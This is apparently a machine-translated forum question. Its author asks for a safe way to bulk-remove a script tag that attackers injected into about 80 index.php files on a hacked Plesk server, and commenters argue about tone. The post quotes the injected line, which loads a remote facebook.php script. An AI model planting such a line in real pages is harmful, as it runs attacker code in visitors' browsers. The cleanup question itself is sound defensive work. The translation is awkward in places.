很遗憾,我再一次在Linux Plesk服务器上处理被黑网站。虽然这个问题已经修正了FTP访问的改变(它涉及到PC上着名的Filezilla FTP代码),但我很想知道如何编辑文件,因为它可能需要一个多小时才能将站点恢复到最近的备份我们有,我很乐意让它更快地恢复在线。 黑客相当简单:在网站中的许多索引*(只有index.php似乎)文件中插入了JavaScript代码。 我正在寻找一种方式来大规模编辑被黑客入侵的文件,知道即使目标JavaScript代码是相同的,它也可能是从一些也可能被黑客入侵的网站调用的。因此,虽然用了我合法的索引文件与Linux命令行:编辑被黑客入侵的索引文件
<?php
现在开始喜欢
<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php
作为该链包含一个变量开始,你能不能帮我找到一个安全可靠的方法编辑所有的改变索引文件(找到约80个)? 我以前用过SED替换,但是这次替换链的一部分变化很大,所以我可以用通配符吗? 最好的问候,谢谢光芒!
@sehe其实,我downvoted答案并且坦率地说是煽动性的。 OP有很多问题需要处理被黑客入侵的服务器,其中包括修复这个问题所涉及的损害。也许OP应该编辑帖子,说出“我确定并删除了这个漏洞”,以便从社区获得合法的帮助。 – poundifdef 2011-04-21 22:31:52
我很欣赏你低估了它。无害。我会删除在OP的snarky评论。然而,我觉得这两个答案都是为了防止进一步的危害和损害而作出的。我确实认为从那里开始另一个答案是没有用的。 – sehe 2011-04-21 22:35:35
这个美妙的网站是为了帮助像我这样的人提高他们的知识,例如正则表达式和cli工具,而不是接受半智慧和无用的悲观评论,帮助任何人。 – Denis 2011-04-21 22:36:52